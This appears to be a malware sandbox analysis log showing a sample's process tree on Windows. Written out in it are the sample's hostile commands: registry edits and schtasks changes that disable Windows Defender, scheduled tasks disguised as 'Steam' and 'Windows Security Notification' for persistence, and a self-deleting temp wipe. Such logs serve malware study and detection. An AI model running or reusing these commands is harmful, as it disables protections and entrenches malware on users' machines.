C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:1552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵PID:336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:1100
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:1804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:2012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:1676
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵PID:1720
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵PID:1152
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵PID:1532
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵PID:1700
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:1896
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:1104
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:1008
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:1060
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
PID:1820
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Rtsveoxqatvjs.exe"C:\Users\Admin\AppData\Local\Temp\Rtsveoxqatvjs.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 10883⤵
- Loads dropped DLL
- Program crash
PID:1720
-
-
-
C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe"C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:652
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe"C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:1408
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe"C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1348 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:1056
-
-
C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1484 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:1900
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\uplqX772QRKw.bat" "4⤵PID:1676
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:1896
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost5⤵
- Runs ping.exe
PID:1468
-
-
C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 15124⤵
- Loads dropped DLL
- Program crash
PID:1104
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit3⤵PID:2664
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\Admin\AppData\Local\Temp\*4⤵
- Deletes itself
PID:2692
-
-
-